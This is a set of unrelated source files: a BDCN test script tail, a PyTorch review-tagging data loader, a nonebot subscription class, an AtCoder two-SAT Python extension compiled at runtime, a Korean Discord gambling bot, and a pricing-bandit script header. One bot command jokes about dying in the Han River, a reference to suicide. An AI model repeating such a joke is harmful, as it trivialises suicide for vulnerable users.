args.inputDir = inputDir
args.cuda = True
forwardAll(model, args)
def parse_args():
parser = argparse.ArgumentParser('test BDCN')
parser.add_argument('-d', '--dataset', type=str, choices=cfg.config_test.keys(), default='bsds500', help='The dataset to train')
parser.add_argument('-i', '--inputDir', type=str, default='images/ToScan', help='Input image directory for testing.')
parser.add_argument('-c', '--cuda', action='store_true', help='whether use gpu to train network', default=True)
parser.add_argument('-g', '--gpu', type=str, default='0', help='the gpu id to train net')
parser.add_argument('-m', '--model', type=str, default='models/bdcn_pretrained_on_nyudv2_depth.pth', help='the model to test')
parser.add_argument('--res-dir', type=str, default='bdcn', help='the dir to store result')
parser.add_argument('-k', type=int, default=2, help='the k-th split set of multicue')
return parser.parse_args()
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(levelname)s:\t%(message)s', level=logging.INFO)
main()
|
import torch
import torch.utils.data as data
import random
import math
import os
import logging
from utils import config
import pickle
from tqdm import tqdm
import pprint
import pdb
pp = pprint.PrettyPrinter(indent=1)
import re
import ast
#from utils.nlp import normalize
import time
from collections import defaultdict
from utils.data_reader import load_dataset
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
class Dataset(data.Dataset):
"""Custom data.Dataset compatible with data.DataLoader."""
def __init__(self, data, vocab):
"""Reads source and target sequences from txt files."""
self.vocab = vocab
self.data = data
def __getitem__(self, index):
"""Returns one data pair (source and target)."""
item = {}
item["review_text"] = self.data["reviews"][index]
item["label"] = self.data["labels"][index]
item["tag_text"] = self.data["tags"][index]
item["tag_aln_text"] = self.data["tag_aln"][index]
item["ipt_token"], item["ipt_ext"], item["oovs"], \
item["ipt_review"], item["review_len"], item['max_len'], item['num'] = self.preprocess((item["review_text"],
item["label"]))
item["tag"] = self.preprocess(item["tag_text"], tgt=True)
item["tag_aln"] = item["tag_aln_text"] + [0] # for eos
item["tag_ext"] = self.target_oovs(item["tag_text"], item["oovs"])
return item
def __len__(self):
return len(self.data["tags"])
def target_oovs(self, target, oovs):
ids = []
for w in target:
if w not in self.vocab.word2index:
if w in oovs:
ids.append(len(self.vocab.word2index) + oovs.index(w))
else:
ids.append(config.UNK_idx)
else:
ids.append(self.vocab.word2index[w])
ids.append(config.EOS_idx)
return ids
def input_oov(self, sentence, oovs=[]): # oov for input
ids = []
for w in sentence:
if w in self.vocab.word2index:
i = self.vocab.word2index[w]
ids.append(i)
else:
if w not in oovs:
oovs.append(w)
oov_num = oovs.index(w)
ids.append(len(self.vocab.word2index) + oov_num)
return ids, oovs
def preprocess(self, arr, tgt=False,):
"""Converts words to ids."""
if(tgt):
sequence = [self.vocab.word2index[word] if word in self.vocab.word2index else config.UNK_idx for word in arr] + [config.EOS_idx]
return sequence
else:
reviews, labels = arr
X_reviews = [] # list of list
X_tokens = [] # list
# X_sent_ids = []
X_exts = [] # list
X_lengths = [] # list
max_r_len = max(len(r) for r in reviews) + 1 # 1 for eos
r_num = len(reviews)
oovs = []
for i, sentence in enumerate(reviews):
# todo 每个sentence末尾是否要加 'EOS' ?
X_lengths.append(len(sentence)) # todo: 目前每个sentence末尾都有一个 eos
sentence_id = [self.vocab.word2index[word] if word in self.vocab.word2index else config.UNK_idx for word in sentence]
X_tokens += sentence_id
# X_sent_ids += [i] * len(sentence_id)
X_ext, oovs = self.input_oov(sentence, oovs)
X_exts += X_ext
X_reviews.append(sentence_id)
return X_tokens, X_exts, oovs, X_reviews, X_lengths, max_r_len, r_num
def collate_fn(batch_data):
def merge(sequences, multiple=""): # len(sequences) = bsz
if multiple:
if multiple == "two": seqs, seq_exts = sequences
else: seqs, seq_exts, seq_aln = sequences
lengths = [len(seq) for seq in seqs] # batch中最长的 src_len
padded_seqs = torch.zeros(len(seqs), max(lengths)).long()
padded_seq_exts = torch.zeros(len(seqs), max(lengths)).long()
padded_seq_aln = torch.zeros(len(seqs), max(lengths)).long()
for i, seq in enumerate(seqs):
end = lengths[i]
padded_seqs[i, :end] = torch.LongTensor(seq)
padded_seq_exts[i, :end] = torch.LongTensor(seq_exts[i])
if multiple == "three":
padded_seq_aln[i,:end] = torch.LongTensor(seq_aln[i])
if multiple == "two": return padded_seqs, padded_seq_exts, lengths
else: return padded_seqs, padded_seq_exts, padded_seq_aln, lengths
else:
lengths = [len(seq) for seq in sequences]
padded_seqs = torch.zeros(len(sequences), max(lengths)).long()
for i, seq in enumerate(sequences):
end = lengths[i]
padded_seqs[i, :end] = torch.LongTensor(seq)
return padded_seqs, lengths
def double_merge(r_seqs, labels, r_lens, src_len, lens, nums):
max_r_len = max(lens)
max_r_num = max(nums)
padded_seqs = torch.zeros(len(r_seqs), max_r_num, max_r_len).long()
padded_seqs[:,:,0] = config.EOS_idx
num_mask = torch.zeros(len(r_seqs), max_r_num).bool()
padded_len = torch.ones(len(r_seqs), max_r_num).long()
padded_label = torch.zeros(len(r_seqs), max_r_num).long()
max_src_len = max(src_len)
lens_list = []
s = 0
for i, rs in enumerate(r_seqs):
item_lens = r_lens[i] + [max_src_len-src_len[i]] # lengths of reviews and pad
lens_list.append(item_lens)
num_mask[i,:len(rs)] = True
padded_len[i,:len(rs)] = torch.LongTensor(r_lens[i])
padded_label[i,:len(rs)] = torch.LongTensor(labels[i])
for ri, r in enumerate(rs):
end = r_lens[i][ri] # 当前这个评论的长度
padded_seqs[i, ri, :end] = torch.LongTensor(r)
return padded_seqs, padded_label, num_mask, padded_len, lens_list
batch_data.sort(key=lambda x: len(x["ipt_token"]), reverse=True)
item_info = {}
for key in batch_data[0].keys():
item_info[key] = [d[key] for d in batch_data]
## reviews - token sequence
tok_batch, tok_ext_batch, src_length = merge((item_info['ipt_token'], item_info['ipt_ext']),
multiple="two")
## reviews - review sequence
reviews_batch, labels_batch, reviews_mask, reviews_len, len_list = double_merge(item_info['ipt_review'],
item_info['label'],
item_info["review_len"],
src_length,
item_info['max_len'],
item_info['num'])
## Target
tag_batch, tag_ext_batch, tag_aln_batch, tgt_length= merge((item_info['tag'], item_info['tag_ext'], item_info['tag_aln']),
multiple="three")
d = {}
d['review_batch'] = tok_batch.to(config.device) # (bsz, src_len)
d['review_length'] = torch.LongTensor(src_length).to(config.device) # (bsz,)
d['review_ext_batch'] = tok_ext_batch.to(config.device) # (bsz, src_len)
d['reviews_batch'] = reviews_batch.to(config.device) # (bsz, max_r_num, max_r_len)
d['reviews_mask'] = reviews_mask.to(config.device) # (bsz, max_r_num)
d['reviews_length'] = reviews_len.to(config.device) # (bsz, max_r_num)
d['reviews_length_list'] = len_list # list of list. for splitting reviews and pad
d['reviews_label'] = labels_batch.to(config.device)
##output
d['tags_batch'] = tag_batch.to(config.device) # (bsz, max_target_len)
d['tags_length'] = torch.LongTensor(tgt_length).to(config.device)
d['tags_ext_batch'] = tag_ext_batch.to(config.device)
d['tags_idx_batch'] = tag_aln_batch.to(config.device)
##text
d['review_text'] = item_info['review_text']
d['label'] = item_info['label']
d['tag_text'] = item_info['tag_text']
d['oovs'] = item_info["oovs"]
return d
def write_config():
if not config.test:
if not os.path.exists(config.save_path):
os.makedirs(config.save_path)
with open(config.save_path+'config.txt', 'w') as the_file:
for k, v in config.arg.__dict__.items():
if "False" in str(v):
pass
elif "True" in str(v):
the_file.write("--{} ".format(k))
else:
the_file.write("--{} {} ".format(k,v))
def prepare_data_seq(batch_size=16):
pairs_tra, pairs_val, pairs_tst, vocab = load_dataset()
logging.info("Vocab {} ".format(vocab.n_words))
dataset_train = Dataset(pairs_tra, vocab)
data_loader_tra = torch.utils.data.DataLoader(dataset=dataset_train,
batch_size=batch_size,
shuffle=True, collate_fn=collate_fn)
dataset_valid = Dataset(pairs_val, vocab)
data_loader_val = torch.utils.data.DataLoader(dataset=dataset_valid,
batch_size=batch_size,
shuffle=True, collate_fn=collate_fn)
dataset_test = Dataset(pairs_tst, vocab)
data_loader_tst = torch.utils.data.DataLoader(dataset=dataset_test,
batch_size=1,
shuffle=False, collate_fn=collate_fn)
write_config()
return data_loader_tra, data_loader_val, data_loader_tst, vocab |
<gh_stars>1-10
import time
import asyncio
from typing import Callable, Coroutine, List, Dict, Union, Any
import nonebot
from nonebot import require
from nonebot.log import logger
from nonebot.adapters.onebot.v11 import MessageSegment, Message
# from nonebot.internal.adapter.message import Message
scheduler = require("nonebot_plugin_apscheduler").scheduler
SIMPLE_INFO_TYPE = Union[None, str, int, bytes, MessageSegment, Message]
COMPLEX_INFO_TYPE = List[SIMPLE_INFO_TYPE]
INFO_TYPE = Union[SIMPLE_INFO_TYPE, COMPLEX_INFO_TYPE]
def _parse_simple_info(info: SIMPLE_INFO_TYPE):
'''
分析info并构造MessageSegment
'''
if isinstance(info, str):
return MessageSegment.text(info)
elif isinstance(info, int):
return MessageSegment.text(str(info))
elif isinstance(info, bytes):
return MessageSegment.image(info)
elif isinstance(info, MessageSegment):
return info
return MessageSegment.text("")
def _construct_message(info: INFO_TYPE) -> Message:
'''
分析info构造Message
'''
if isinstance(info, (str, int, bytes, MessageSegment, Message)):
return _parse_simple_info(info)
elif isinstance(info, list):
msg: Message = None
for it in info:
if msg is None:
msg = Message(_parse_simple_info(it))
else:
msg += _parse_simple_info(it)
return msg
return None
class topic:
'''
订阅的基本单元,所有操作最终都由topic对象执行
成员变量:
name: topic名称,用于完整描述topic工作内容
title: topic标题,同时也是topic主键
aliases: topic别名,通过别名也可以访问到topic
cron: cron定时器的各项参数,以dict表示,以存储至文件中,运行时无作用
immediately: 是否立即发送,如为True,后续信息都会立即发送
no_check: 如为True则不进行生命计数
info: 将要推送的数据
cache: 上次推送的数据
to_callable: 当不为None时,将会对函数订阅者发送此变量
last_send: 上次推送时间戳
last_publish: 上次发布时间戳
check_count: 生命计数器,达到一定数值后释放对象,暂未实装
job: scheduler.job对象,内部使用
subscriber: 来自外部的订阅者,在备份时间或bot关闭时会写入存储文件
subscriber_callable: 来自bot内部的函数订阅者,不会存储到文件里
方法:
pack: 在存储时调用,将成员变量打包成dict,方便存储
update: 重复register同一个title时,会使用本方法更新topic
publish: 在调用register时,会返回topic对象的这个方法,用以发布内容
subscribe: 订阅时,最终执行的方法
remove: 退订时,最终执行的方法
send: 推送内容的方法,未来可能将实现拆成独立模块
'''
name: str = ""
title: str = ""
aliases: List[str] = None
cron: Dict[Any, Any] = None
immediately: bool = False
hide: bool = False
no_check: bool = False # 插件内部使用,不建议在外部调用时使用
info: Message = None
cache: Message = None
to_callable: Any = None
last_send: float = -1
last_publish: float = -1
check_count: int = 0
job = None
subscriber: Dict[str, List[Union[str, int]]] = None
subscriber_callable: List[Callable[[Any], Any]] = None
black_list: Dict[str, List[Union[str, int]]] = None
def __str__(self) -> str:
return self.name if self.name != "" else self.title
def pack(self):
'''
将topic对象打包成dict,方便保存数据
'''
package = {
"name": self.name,
"title": self.title,
"aliases": self.aliases,
"immediately": self.immediately,
"hide": self.hide,
"no_check": self.no_check,
"subscriber": self.subscriber,
"black_list": self.black_list
}
package.update(self.cron)
return package
def __init__(
self,
title: str,
hour: Union[str, int],
name: str = "",
aliases: List[str] = None,
immediately: bool = False,
hide: bool = False,
no_check: bool = False,
subscriber: Dict[str, List[Union[str, int]]] = None,
black_list: Dict[str, List[Union[str, int]]] = None,
**kwarg
) -> None:
'''
topic构造方法
参数:
title: 同成员变量
hour: 传入scheduler使用
name: 同成员变量
aliases: 同成员变量
immediately: 同成员变量
no_check: 同成员变量
subscriber: 直接传入订阅者列表,一般用来读取文件中的数据,不在代码中使用
kwarg: 传入scheduler使用,具体参数参考apscheduler
'''
self.title = title
self.name = name
self.aliases = aliases if aliases is not None else []
self.immediately = immediately
self.hide = hide
self.no_check = no_check
self.subscriber = subscriber if subscriber is not None else {}
self.subscriber_callable = []
self.black_list = black_list if black_list is not None else {}
if not immediately:
self.job = scheduler.add_job(
self.send,
"cron",
hour=hour,
**kwarg
)
self.cron = kwarg
self.cron["hour"] = hour
logger.debug(f"{name} 注册完成")
def update(
self,
hour: Union[str, int],
name: str = "",
aliases: List[str] = None,
immediately: bool = False,
hide: bool = False,
no_check: bool = False,
**kwarg
):
'''
重复调用register时使用本方法更新topic,参数同__init__方法
'''
if name != "":
self.name = name
if aliases is not None:
self.aliases = aliases
if self.immediately and not immediately:
if self.job is None:
self.job = scheduler.add_job(
self.send,
"cron",
hour=hour,
**kwarg
)
self.cron = kwarg
self.cron["hour"] = hour
else:
self.job.reschedule("cron", **kwarg)
self.job.resume()
self.cron = kwarg
self.cron["hour"] = hour
elif not self.immediately and immediately:
self.job.pause()
self.cron = {}
self.immediately = immediately
self.hide = hide
self.no_check = no_check
logger.debug(f"{self.name if self.name != '' else self.title} 更新完成")
def publish(
self,
info: INFO_TYPE,
to_callable: Any = None,
immediately: bool = False
) -> bool:
'''
发布用的方法
参数:
info: 需要推送的消息,接受多种形式的参数
to_callable: 该参数不为None时,会将该参数推送给函数订阅者
immediately: 本次发布是否需要立即推送,只影响本次发布,不影响topic
'''
logger.debug(f"{self.name if self.name != '' else self.title} 准备发布")
self.cache = self.info
self.info = _construct_message(info)
if to_callable is not None:
self.to_callable = to_callable
self.last_publish = time.time()
if immediately:
self.send()
return True
return True
def subscribe(
self,
subscriber: Union[Union[str, int], Callable[[Any], Any]],
type_: str = "callable"
) -> bool:
'''
订阅操作的最终执行方法
参数:
subscriber: 订阅者
type_: 订阅者类型,现在一般为"users"或"groups"
'''
if not self.is_exposed(subscriber, type_):
return False
logger.debug(f"{self.name if self.name != '' else self.title} 被订阅")
if isinstance(subscriber, Callable):
if subscriber in self.subscriber_callable:
return False
self.subscriber_callable.append(subscriber)
return True
if type_ not in self.subscriber:
self.subscriber[type_] = []
subscriber = str(subscriber)
if subscriber in self.subscriber[type_]:
return False
self.subscriber[type_].append(subscriber)
return True
def remove(
self,
subscriber: Union[Union[str, int], Callable[[Any], Any]],
type_: str
) -> bool:
'''
退订操作的最终执行方法
参数:
subscriber: 订阅者
type_: 订阅者类型,现在一般为"users"或"groups"
'''
logger.debug(f"{self.name if self.name != '' else self.title} 被取消订阅")
if isinstance(subscriber, Callable):
if subscriber not in self.subscriber_callable:
return False
self.subscriber_callable.remove(subscriber)
return True
if type_ not in self.subscriber:
return False
subscriber = str(subscriber)
if subscriber not in self.subscriber[type_]:
return False
self.subscriber[type_].remove(subscriber)
return True
def is_exposed(
self,
subscriber: Union[str, int] = None,
type_: str = None,
) -> bool:
'''
检查是否可以向该用户/群暴露本服务
参数:
subscriber: 订阅者
type_: 订阅者类型,现在一般为"users"或"groups"
'''
if type_ == "callable":
return True
if subscriber is None or type_ is None:
return self.hide
if type_ in self.black_list and subscriber in self.black_list[type_]:
return False
return True
def ban(
self,
subscriber: Union[str, int],
type_: str
) -> bool:
'''
ban操作的最终执行方法
参数:
subscriber: 订阅者
type_: 订阅者类型,现在一般为"users"或"groups"
'''
if type_ not in self.black_list:
self.black_list[type_] = []
subscriber = str(subscriber)
if subscriber in self.black_list[type_]:
return False
self.black_list[type_].append(subscriber)
self.remove(subscriber, type_)
return True
def unban(
self,
subscriber: Union[str, int],
type_: str
) -> bool:
'''
解ban操作的最终执行方法
参数:
subscriber: 订阅者
type_: 订阅者类型,现在一般为"users"或"groups"
'''
if type_ not in self.black_list:
return False
subscriber = str(subscriber)
if subscriber not in self.black_list[type_]:
return False
self.black_list[type_].remove(subscriber)
return True
async def send(self):
'''
推送内容方法
'''
if self.info is None:
logger.warning(
f"{self.name if self.name != '' else self.title} 未准备好"
)
return
if self.last_send > self.last_publish:
self.check_count += 1
self.last_send = time.time()
logger.info(
f"{self.name if self.name != '' else self.title} 正在推送"
)
if "users" in self.subscriber:
for user in self.subscriber["users"]:
await nonebot.get_bot().send_private_msg(
user_id=int(user),
message=self.info
)
if "groups" in self.subscriber:
for group in self.subscriber["groups"]:
await nonebot.get_bot().send_group_msg(
group_id=int(group),
message=self.info
)
for func in self.subscriber_callable:
if self.to_callable is None:
if asyncio.iscoroutinefunction(func):
await func(self.info)
func(self.info)
else:
if asyncio.iscoroutinefunction(func):
await func(self.to_callable)
func(self.to_callable)
self.to_callable = None
|
# TODO: メモリリーク確認
# TODO: __repr__ を書く
code_two_sat = r"""
#define PY_SSIZE_T_CLEAN
#include <Python.h>
#include "structmember.h"
// 元のライブラリの private を剥がした
// >>> AtCoder >>>
#ifndef ATCODER_TWOSAT_HPP
#define ATCODER_TWOSAT_HPP 1
#ifndef ATCODER_INTERNAL_SCC_HPP
#define ATCODER_INTERNAL_SCC_HPP 1
#include <algorithm>
#include <utility>
#include <vector>
namespace atcoder {
namespace internal {
template <class E> struct csr {
std::vector<int> start;
std::vector<E> elist;
csr(int n, const std::vector<std::pair<int, E>>& edges)
: start(n + 1), elist(edges.size()) {
for (auto e : edges) {
start[e.first + 1]++;
}
for (int i = 1; i <= n; i++) {
start[i] += start[i - 1];
}
auto counter = start;
for (auto e : edges) {
elist[counter[e.first]++] = e.second;
}
}
};
// Reference:
// <NAME>,
// Depth-First Search and Linear Graph Algorithms
struct scc_graph {
public:
scc_graph(int n) : _n(n) {}
int num_vertices() { return _n; }
void add_edge(int from, int to) { edges.push_back({from, {to}}); }
// @return pair of (# of scc, scc id)
std::pair<int, std::vector<int>> scc_ids() {
auto g = csr<edge>(_n, edges);
int now_ord = 0, group_num = 0;
std::vector<int> visited, low(_n), ord(_n, -1), ids(_n);
visited.reserve(_n);
auto dfs = [&](auto self, int v) -> void {
low[v] = ord[v] = now_ord++;
visited.push_back(v);
for (int i = g.start[v]; i < g.start[v + 1]; i++) {
auto to = g.elist[i].to;
if (ord[to] == -1) {
self(self, to);
low[v] = std::min(low[v], low[to]);
} else {
low[v] = std::min(low[v], ord[to]);
}
}
if (low[v] == ord[v]) {
while (true) {
int u = visited.back();
visited.pop_back();
ord[u] = _n;
ids[u] = group_num;
if (u == v) break;
}
group_num++;
}
};
for (int i = 0; i < _n; i++) {
if (ord[i] == -1) dfs(dfs, i);
}
for (auto& x : ids) {
x = group_num - 1 - x;
}
return {group_num, ids};
}
std::vector<std::vector<int>> scc() {
auto ids = scc_ids();
int group_num = ids.first;
std::vector<int> counts(group_num);
for (auto x : ids.second) counts[x]++;
std::vector<std::vector<int>> groups(ids.first);
for (int i = 0; i < group_num; i++) {
groups[i].reserve(counts[i]);
}
for (int i = 0; i < _n; i++) {
groups[ids.second[i]].push_back(i);
}
return groups;
}
private:
int _n;
struct edge {
int to;
};
std::vector<std::pair<int, edge>> edges;
};
} // namespace internal
} // namespace atcoder
#endif // ATCODER_INTERNAL_SCC_HPP
#include <cassert>
#include <vector>
namespace atcoder {
// Reference:
// <NAME>, M. Plass, and <NAME>,
// A Linear-Time Algorithm for Testing the Truth of Certain Quantified Boolean
// Formulas
struct two_sat {
public:
two_sat() : _n(0), scc(0) {}
two_sat(int n) : _n(n), _answer(n), scc(2 * n) {}
void add_clause(int i, bool f, int j, bool g) {
assert(0 <= i && i < _n);
assert(0 <= j && j < _n);
scc.add_edge(2 * i + (f ? 0 : 1), 2 * j + (g ? 1 : 0));
scc.add_edge(2 * j + (g ? 0 : 1), 2 * i + (f ? 1 : 0));
}
bool satisfiable() {
auto id = scc.scc_ids().second;
for (int i = 0; i < _n; i++) {
if (id[2 * i] == id[2 * i + 1]) return false;
_answer[i] = id[2 * i] < id[2 * i + 1];
}
return true;
}
std::vector<bool> answer() { return _answer; }
// private:
int _n;
std::vector<bool> _answer;
internal::scc_graph scc;
};
} // namespace atcoder
#endif // ATCODER_TWOSAT_HPP
// <<< AtCoder <<<
using namespace std;
using namespace atcoder;
#define PARSE_ARGS(types, ...) if(!PyArg_ParseTuple(args, types, __VA_ARGS__)) return NULL
struct TwoSAT{
PyObject_HEAD
two_sat* ts;
};
extern PyTypeObject TwoSATType;
// >>> TwoSAT definition >>>
static void TwoSAT_dealloc(TwoSAT* self){
delete self->ts;
Py_TYPE(self)->tp_free((PyObject*)self);
}
static PyObject* TwoSAT_new(PyTypeObject* type, PyObject* args, PyObject* kwds){
return type->tp_alloc(type, 0);
}
static int TwoSAT_init(TwoSAT* self, PyObject* args){
long n;
if(!PyArg_ParseTuple(args, "l", &n)) return -1;
if(n < 0 || n > (long)1e8){
PyErr_Format(PyExc_IndexError,
"TwoSAT constructor constraint error (constraint: 0<=n<=1e8, got n=%d)", n);
return -1;
}
self->ts = new two_sat(n);
return 0;
}
static PyObject* TwoSAT_add_clause(TwoSAT* self, PyObject* args){
long i, j;
int f, g;
PARSE_ARGS("lplp", &i, &f, &j, &g);
if(i < 0 || i >= self->ts->_n || j < 0 || j >= self->ts->_n){
PyErr_Format(PyExc_IndexError,
"TwoSAT add_clause index out of range (n=%d, i=%d, j=%d)", self->ts->_n, i, j);
return (PyObject*)NULL;
}
self->ts->add_clause(i, (bool)f, j, (bool)g);
Py_RETURN_NONE;
}
static PyObject* TwoSAT_satisfiable(TwoSAT* self, PyObject* args){
PyObject* res = self->ts->satisfiable() ? Py_True : Py_False;
return Py_BuildValue("O", res);
}
static PyObject* TwoSAT_answer(TwoSAT* self, PyObject* args){
const vector<bool>& answer = self->ts->answer();
const int& n = self->ts->_n;
PyObject* list = PyList_New(n);
for(int i = 0; i < n; i++){
PyList_SET_ITEM(list, i, Py_BuildValue("O", answer[i] ? Py_True : Py_False));
}
return list;
}
/*
static PyObject* TwoSAT_repr(PyObject* self){
PyObject* res = PyUnicode_FromFormat("TwoSAT()");
return res;
}
*/
static PyMethodDef TwoSAT_methods[] = {
{"add_clause", (PyCFunction)TwoSAT_add_clause, METH_VARARGS, "Add clause"},
{"satisfiable", (PyCFunction)TwoSAT_satisfiable, METH_VARARGS, "Check if problem satisfiable"},
{"answer", (PyCFunction)TwoSAT_answer, METH_VARARGS, "Get answer"},
{NULL} /* Sentinel */
};
PyTypeObject TwoSATType = {
PyObject_HEAD_INIT(NULL)
"acl_twosat.TwoSAT", /*tp_name*/
sizeof(TwoSAT), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)TwoSAT_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*reserved*/
0,//TwoSAT_repr, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/
0, /*tp_doc*/
0, /*tp_traverse*/
0, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
TwoSAT_methods, /*tp_methods*/
0, /*tp_members*/
0, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
(initproc)TwoSAT_init, /*tp_init*/
0, /*tp_alloc*/
TwoSAT_new, /*tp_new*/
0, /*tp_free*/
0, /*tp_is_gc*/
0, /*tp_bases*/
0, /*tp_mro*/
0, /*tp_cache*/
0, /*tp_subclasses*/
0, /*tp_weaklist*/
0, /*tp_del*/
0, /*tp_version_tag*/
0, /*tp_finalize*/
};
// <<< TwoSAT definition <<<
static PyModuleDef acl_twosatmodule = {
PyModuleDef_HEAD_INIT,
"acl_twosat",
NULL,
-1,
};
PyMODINIT_FUNC PyInit_acl_twosat(void)
{
PyObject* m;
if(PyType_Ready(&TwoSATType) < 0) return NULL;
m = PyModule_Create(&acl_twosatmodule);
if(m == NULL) return NULL;
Py_INCREF(&TwoSATType);
if (PyModule_AddObject(m, "TwoSAT", (PyObject*)&TwoSATType) < 0) {
Py_DECREF(&TwoSATType);
Py_DECREF(m);
return NULL;
}
return m;
}
"""
code_two_sat_setup = r"""
from distutils.core import setup, Extension
module = Extension(
"acl_twosat",
sources=["two_sat.cpp"],
extra_compile_args=["-O3", "-march=native", "-std=c++14"]
)
setup(
name="acl_twosat",
version="0.0.1",
description="wrapper for atcoder library twosat",
ext_modules=[module]
)
"""
import os
import sys
if sys.argv[-1] == "ONLINE_JUDGE" or os.getcwd() != "/imojudge/sandbox":
with open("two_sat.cpp", "w") as f:
f.write(code_two_sat)
with open("two_sat_setup.py", "w") as f:
f.write(code_two_sat_setup)
os.system(f"{sys.executable} two_sat_setup.py build_ext --inplace")
from acl_twosat import TwoSAT
|
import asyncio
import discord
import json
import random
import math
import time
import datetime
import os
import shutil
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.font_manager as fm
from discord.ext import commands
from discord.ext import tasks
class Stock(commands.Cog):
def __init__(self, client):
self.client = client
print(f'{__name__} 로드 완료!')
@commands.command(aliases=["차트", "매수", "매도", "그래프", "주식정보", "주식구매", "주식판매"])
async def 주식(self, ctx):
await ctx.send("현재 점검중인 기능입니다.")
@commands.command()
async def 계정생성(self, ctx):
user_id = str(ctx.author.id)
with open("stock/usr_data.json", 'r') as f:
user_data = json.load(f) # 유저 데이터 불러오는 코드
try:
a = user_data[user_id]
await ctx.send('이미 등록된 계정입니다.')
return
except KeyError:
pass
user_data[user_id] = {}
user_data[user_id]["money"] = 1000
user_data[user_id]['alba'] = None
with open("stock/usr_data.json", 'w') as f:
json.dump(user_data, f, indent=4)
await ctx.send('계정을 생성했습니다!')
@commands.command()
async def 지갑(self, ctx, member: discord.Member = None):
if member is None:
member = ctx.author
user_id = str(member.id)
with open("stock/data.json", 'r') as f:
stock_data = json.load(f) # 주식 데이터 불러오는 코드
with open("stock/usr_data.json", 'r') as f:
user_data = json.load(f) # 유저 데이터 불러오는 코드
try:
embed = discord.Embed(title='지갑', description=str(member.mention), colour=discord.Color.red())
embed.add_field(name='돈', value=f'{str(user_data[user_id]["money"])}원', inline=False)
await ctx.send(embed=embed)
except KeyError:
await ctx.send('계정을 먼저 생성해주세요.')
@commands.command(aliases=["알바"])
async def 알바하자(self, ctx):
author_id = str(ctx.author.id)
currenttime = time.strftime('%Y%m%d')
with open(f'stock/usr_data.json', 'r') as f:
money = json.load(f)
try:
if money[author_id]['alba'] is None:
pass
elif int(currenttime) == int(money[author_id]['alba']):
await ctx.send("알바는 하루에 1번만 가능합니다.")
return
money_choices = [1000, 2000, 3000, 4000, 5000, 6000, 7000, 8590]
got_money = random.choice(money_choices)
await ctx.send(f'돈이다. ({got_money}원)')
money[author_id]['money'] += got_money
money[author_id]['alba'] = currenttime
with open(f'stock/usr_data.json', 'w') as s:
json.dump(money, s, indent=4)
except KeyError:
await ctx.send('계정을 먼저 생성해주세요.')
return
@commands.command()
async def 가즈아(self, ctx, amount):
amount = int(amount)
author_id = str(ctx.author.id)
if amount <= 0:
await ctx.send('1원 이상으로 입력해주세요.')
return
with open(f'stock/usr_data.json', 'r') as f:
money = json.load(f)
try:
if amount > money[author_id]['money']:
await ctx.send('돈이 부족합니다.')
return
money[author_id]['money'] -= amount
amolang = ['yes', 'no', 'no']
result = random.choice(amolang)
if result == 'yes':
await ctx.send('도박에 성공했습니다. 3배의 돈을 벌었습니다.')
money[author_id]['money'] += amount * 4
else:
await ctx.send('도박에 실패했습니다. 돈을 잃었습니다.')
with open(f'stock/usr_data.json', 'w') as s:
json.dump(money, s, indent=4)
except KeyError:
await ctx.send('계정을 먼저 생성해주세요.')
return
@commands.command()
async def 한강가즈아(self, ctx):
author_id = str(ctx.author.id)
try:
with open(f'stock/usr_data.json', 'r') as f:
money = json.load(f)
del money[author_id]
with open(f'stock/usr_data.json', 'w') as f:
json.dump(money, f, indent=4)
except KeyError:
await ctx.send('계정을 먼저 생성해주세요.')
return
await ctx.send('당신은 한강에서 사망하셨습니다. 계정이 삭제되었습니다.')
@commands.command()
async def 가위바위보(self, ctx):
user_id = str(ctx.author.id)
with open("stock/usr_data.json", 'r') as f:
user_data = json.load(f) # 유저 데이터 불러오는 코드
await ctx.send("`가위, 바위, 보` 중에서 하나를 5초 안에 말해주세요!")
try:
a = user_data[user_id]
except KeyError:
await ctx.send('계정을 먼저 생성해주세요.')
return
rpc = ['가위', '바위', '보']
def check(m):
return m.content == "가위" or m.content == "바위" or m.content == "보"
def game(A, B):
if A not in rpc:
return
if A == rpc[0] and B == rpc[2] or A == rpc[1] and B == rpc[0] or A == rpc[2] and B == rpc[1]:
return 1
elif A == B:
return 2
elif A == rpc[0] and B == rpc[1] or A == rpc[1] and B == rpc[2] or A == rpc[2] and B == rpc[0]:
return 3
try:
answer = await self.client.wait_for("message", timeout=5, check=check)
except asyncio.TimeoutError:
await ctx.send("시간이 초과됬어요...")
return
choice = random.choice(rpc)
result = game(answer.content, choice)
if result == 1:
await ctx.send(f"{ctx.author.mention}님이 이겼어요... ({answer.content}, {choice})\n`+100원`")
user_data[user_id]["money"] += 100
elif result == 3:
await ctx.send(f"제가 이겼어요! ({answer.content}, {choice})")
elif result == 2:
await ctx.send(f"비겼네요. ({answer.content}, {choice})\n`+50원`")
user_data[user_id]["money"] += 50
with open("stock/usr_data.json", 'w') as f:
json.dump(user_data, f, indent=4)
def setup(client):
client.add_cog(Stock(client))
|
import os
import sys
import pickle
from typing import List
import numpy as np
import pandas as pd
from scipy.optimize import minimize_scalar
os.environ["OPENBLAS_NUM_THREADS"] = "1"
sys.path.append("../../")
from environments.Settings.EnvironmentManager import EnvironmentManager
from environments.Settings.Scenario import Scenario
from utils.folder_management import handle_folder_creation
from utils.stats.StochasticFunction import IStochasticFunction, AggregatedFunction, MultipliedStochasticFunction
SCENARIO_NAME = "linear_visit_tanh_price"
FOLDER_RESULT = "../../report/csv/pricing_bandit/{}/".format(SCENARIO_NAME)
CSV_DISCRETE_USER_REGRET = True
CSV_CONTINUE_USER_REGRET = True
CSV_DAILY_DISCRETE_REGRET = True
CSV_DAILY_CONT_REGRET = True
N_ARMS_PRICE = 11
